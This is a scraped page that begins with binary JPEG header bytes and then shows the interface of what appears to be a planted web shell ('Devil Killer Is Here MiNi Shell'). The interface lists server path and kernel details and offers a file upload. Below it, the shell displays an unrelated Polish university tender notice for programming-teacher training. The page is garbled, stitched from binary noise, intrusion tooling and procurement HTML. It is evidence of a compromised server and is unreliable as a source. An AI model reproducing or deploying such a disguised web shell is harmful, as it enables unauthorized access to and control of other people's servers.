JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211130/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211130/0029191701-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie materiałów i przeprowadzenie szkoleń dla nauczycieli prowadzących koła informatyczne dla młodzieży uzdolnionej w ramach projektu „CMI” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Politechnika Gdańska</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Wydział Elektroniki Telekomunikacji i Informatyki</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001620</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Narutowicza 11/12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdańsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">80-233</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 583486152</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48 583472445</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">logistyka@eti.pg.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pg.edu.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie materiałów i przeprowadzenie szkoleń dla nauczycieli prowadzących koła informatyczne dla młodzieży uzdolnionej w ramach projektu „CMI” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-58daebcf-51c2-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00291917</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Centrum Mistrzostwa Informatycznego </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/pg_edu <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/pg_edu</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Postępowanie prowadzone jest w języku polskim.<br/> 2. Postępowanie, którego dotyczy niniejszy dokument, oznaczone jest znakiem:CRZP/229/009/U/21<br/> 3. Wykonawcy we wszystkich kontaktach z Zamawiającym powinni powoływać się na ten znak.<br/>4. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu platformy zakupowej <br/> https://platformazakupowa.pl/pn/pg_edu oraz poczty elektronicznej. <br/> 5. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia lub znakiem postępowania. <br/> 6. Zaleca się, aby komunikacja z wykonawcami odbywała się tylko na Platformie za pośrednictwem formularza “Wyślij wiadomość”, nie za pośrednictwem adresu email.<br/> 7. W celu skrócenia czasu udzielenia odpowiedzi na pytania Zamawiający preferuje, aby komunikacja między zamawiającym a wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane były w formie elektronicznej za pośrednictwem Platformy i formularza „Wyślij wiadomość do zamawiającego”. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji Zamawiający uzna datę ich przesłania za pośrednictwem Platformy poprzez kliknięcie przycisku „Wyślij wiadomość” po których pojawi się komunikat, że wiadomość została wysłana do zamawiającego.<br/>8. Zamawiający będzie przekazywał wykonawcom informacje w formie elektronicznej za pośrednictwem Platformy. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie <br/> z obowiązującymi przepisami adresatem jest konkretny wykonawca, będzie <br/> przekazywana w formie elektronicznej za pośrednictwem Platformy do konkretnego <br/> wykonawcy.<br/><br/> 9. Niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na <br/> platformazakupowa.pl, tj.:<br/> a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż <br/> 512 kb/s,<br/> b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB <br/> Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów <br/> operacyjnych – MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/> c) zainstalowana dowolna przeglądarka internetowa, za wyjątkiem Internet <br/> Explorer, ze względu na zakończenie z dniem 17 sierpnia 2021 r. wspierania <br/> przeglądarki Internet Explorer przez firmę Microsoft.<br/> d) włączona obsługa JavaScript,<br/> e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format <br/> plików .pdf,<br/> f) Platforma działa według standardu przyjętego w komunikacji sieciowej – <br/> kodowanie UTF8,<br/> g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz <br/> dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera <br/> zsynchronizowanego z zegarem Głównego Urzędu Miar.<br/><br/> 10. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia <br/> publicznego:<br/> a) musi zaakceptować warunki korzystania z platformazakupowa.pl określone w <br/> Regulaminie zamieszczonym na stronie internetowej pod linkiem w zakładce <br/> „Regulamin&#34; oraz uznać go za wiążący,<br/> b) musi się zapoznać i stosować do Instrukcji składania ofert/wniosków dostępnej <br/> pod linkiem: https://platformazakupowa.pl/strona/45-instrukcje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1 oraz Dz. Urz. UE L 127 z 23.05.2018, str. 2), dalej „RODO”, Zamawiający informuje, że:<br/> a) administratorem Pani/Pana danych osobowych jest Politechnika Gdańska z <br/> siedzibą w 80-233 Gdańsk przy ul. G. Narutowicza 11/12;<br/> b) inspektorem ochrony danych osobowych w Politechnice Gdańskiej jest mgr <br/> inż. Paweł Baniel, tel. +48 58 348-66-29, e-mail: iod@pg.edu.pl;<br/>c) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c <br/> RODO w celu związanym z przedmiotowym postępowaniem o udzielenie <br/> zamówienia publicznego nr CRZP/229/009/U/21 pn. „Opracowanie materiałów i przeprowadzenie szkoleń dla nauczycieli prowadzących koła informatyczne dla młodzieży uzdolnionej w ramach projektu „CMI””;<br/>d) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym <br/> udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych;<br/>e) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania cały czas trwania umowy;<br/> f) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>g) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>h) posiada Pani/Pan:<br/> − na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana <br/> dotyczących;<br/> − na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych <br/> osobowych (skorzystanie z prawa do sprostowania nie może skutkować <br/> zmianą wyniku postępowania udzielenie zamówienia publicznego ani zmianą <br/> postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może <br/> naruszać integralności protokołu oraz jego załączników);<br/> − na podstawie art. 18 RODO prawo żądania od administratora ograniczenia <br/> przetwarzania danych osobowych z zastrzeżeniem przypadków, o których <br/> mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma <br/> zastosowania w odniesieniu do przechowywania, w celu zapewnienia <br/> korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby <br/> fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego <br/> Unii Europejskiej lub państwa członkowskiego);<br/> − prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych <br/> z siedzibą w Warszawie, przy ul. Stawki 2, 00-193 Warszawa, gdy uzna<br/> Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących <br/> narusza przepisy RODO;<br/> i) nie przysługuje Pani/Panu:<br/> − w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych <br/> osobowych;<br/> − prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/> − na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych <br/> osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych <br/> osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">. Dodatkowo, stosownie do art. 19 ust. 4 ustawy Pzp, Zamawiający informuje o ograniczeniach, <br/> o których mowa w art. 19 ust. 2 i 3 oraz 75 ustawy Pzp:<br/> 1) Zamawiający udostępnia dane osobowe, o których mowa w art. 10 rozporządzenia <br/> Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie <br/> ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie <br/> swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne <br/> rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1, z późn. zm.), <br/> zwanego dalej &#34;rozporządzeniem 2016/679&#34;, w celu umożliwienia korzystania ze środków <br/> ochrony prawnej, o których mowa w dziale IX, do upływu terminu na ich wniesienie <br/> 2) Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub <br/> uzupełnienia, o którym mowa w art. 16 rozporządzenia 2016/679, nie może skutkować <br/> zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w <br/> sprawie zamówienia publicznego w zakresie niezgodnym z ustawą. <br/> 3) W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o <br/> którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych <br/> osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">CRZP/229/009/U/21</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 1730049,00 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 21672,20 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na jedną część</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.12.) Maksymalna liczna części, jaka może zostać udzielona jednemu wykonawcy: <span class="normal">1</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przygotowanie i przeprowadzenie zajęć o tematyce „Wprowadzenie do <br/> programowania”, „Algorytmika I”, „Algorytmika II”, „Obsługa platformy CMI : <br/> a. Przedmiot zamówienia obejmuje przygotowanie i przeprowadzenie zajęć.<br/> b. Termin realizacji usługi do: – 15.06.2022 od dnia podpisania umowy<br/> c. Liczba godzin realizacji usług: <br/> - Przeprowadzenie zajęć - 50 h<br/> - Przygotowanie zajęć – 50h <br/> - Łączna suma godzin na przygotowanie i przeprowadzenie zajęć – 100h, w tym:<br/> - Wprowadzenie do programowania – 40h (20h przygotowanie i 20h przeprowadzenie)<br/> - Algorytmika I - 32h (16h przygotowanie i 16h przeprowadzenie),<br/> - Algorytmika II – 20h (10h przygotowanie i 10h przeprowadzenie),<br/> - Obsługa platformy CMI – 8h (4h przygotowanie i 4h przeprowadzenie)<br/> Przez „godzinę świadczenia usługi” rozumie się godzinę dydaktyczną tzn.45 min. Szczegółowy <br/> harmonogram prowadzenia zajęć zostanie ustalony z wybranym Wykonawcą. Zajęcia muszą być <br/> prowadzone w języku polskim.<br/> d. Usługa będzie świadczona dla grup o liczności 20 - 30 osób . <br/> e. Miejsce świadczenia usługi: zajęcia stacjonarne - Politechnika Gdańska Wydział Elektroniki,<br/> Telekomunikacji i Informatyki, ul. Narutowicza 11/12, 80-233 Gdańsk, zajęcia zdalne – platforma CMI<br/> f. Salę wykładową z dostępem do Internetu oraz niezbędny sprzęt zapewnia Zamawiający.<br/><br/>2.	Do obowiązków prowadzącego zajęcia należy w szczególności :<br/>1/ Przygotowanie i przeprowadzenie zajęć zgodnie z harmonogramem.<br/>2/ Przeprowadzenie przed szkoleniem rozeznania poziomu wiedzy i umiejętności uczestników w danej <br/> dziedzinie w formie pre-testu oraz ponownej oceny wiedzy i umiejętności po zakończonym szkoleniu <br/> w celu potwierdzenia nabytych kompetencji przez uczestników w formie post-testu. <br/>3/ Przygotowanie materiałów.<br/>4/ Sprawowanie nadzoru nad frekwencją uczestników zajęć poprzez prowadzenie imiennej listy <br/> obecności w formie tradycyjnej lub elektronicznej.<br/>5/ Dyspozycyjność w godzinach prowadzenia zajęć </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 9851,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80300000-7 - Usługi szkolnictwa wyższego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-06-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta wykonawcy, która uzyska łącznie największą liczbę punktów zgodnie z poniższym wzorem:<br/> P = C + Dl + Dp+Dc +Do<br/>gdzie:<br/> P - łączna liczba punktów<br/> C – liczba punktów przyznana ofercie ocenianej w kryterium „Cena”<br/> Dl – Liczba punktów przyznana ofercie ocenianej w kryterium „Doświadczenie zawodowe w <br/> prowadzeniu zajęć z dziedziny informatyki lub pokrewnych, liczone w latach pracy”<br/> Dp - Liczba punktów przyznana ofercie w kryterium „Umiejętność programowania w jednym <br/> wybranym języku programowania (C++, Pyton, Scratch)”<br/> Dc - Liczba punktów przyznana ofercie ocenianej w kryterium „Znajomość i obsługa platformy <br/> e-learningowej Moodle” <br/> Do – Liczba punktów przyznana ocenianej ofercie w kryterium „Znajoość i obsługa <br/> narzędzi do prowadzenia zajęć online takich jak: MsTeams, Clickmeeting, Cisco Webex <br/> Teams”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe w prowadzeniu zajęć z dziedziny informatyki lub pokrewnych liczone w latach pracy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Umiejętność programowania w jednym wybranym języku programowania (C++, Pyton, Scratch)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Znajomość i obsługa platformy e-learningowej Moodle</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">Kryterium 5</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Znajomość i obsługa narzędzi do prowadzenia zajęć online takich jak: MsTeams, Clickmeeting, Cisco Webex Teams</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przygotowanie i przeprowadzenie zajęć o tematyce „Wprowadzenie do <br/> programowania”, „Algorytmika I”, „Matematyka dyskretna”, „Obsługa platformy CMI : <br/> a. Przedmiot zamówienia obejmuje przygotowanie i przeprowadzenie zajęć.<br/> b. Termin realizacji usługi do: – 15.06.2022 od dnia podpisania umowy<br/> c. Liczba godzin realizacji usług: <br/> - Przeprowadzenie zajęć - 60 h<br/> - Przygotowanie zajęć – 60h <br/> - Łączna suma godzin na przygotowanie i przeprowadzenie zajęć – 120h, w tym:<br/> - Wprowadzenie do programowania – 60h (30h przygotowanie i 30h przeprowadzenie)<br/> - Algorytmika I - 32h (16h przygotowanie i 16h przeprowadzenie),<br/> - Matematyka dyskretna – 16h 8h przygotowanie i 8h przeprowadzenie),<br/> - Obsługa platformy CMI – 12h (6h przygotowanie i 6h przeprowadzenie)<br/> Przez „godzinę świadczenia usługi” rozumie się godzinę dydaktyczną tzn.45 min. Szczegółowy <br/> harmonogram prowadzenia zajęć zostanie ustalony z wybranym Wykonawcą. Zajęcia muszą być <br/> prowadzone w języku polskim.<br/> d. Usługa będzie świadczona dla grup o liczności 20 - 30 osób . <br/> e. Miejsce świadczenia usługi: zajęcia stacjonarne - Politechnika Gdańska Wydział Elektroniki,<br/> Telekomunikacji i Informatyki, ul. Narutowicza 11/12, 80-233 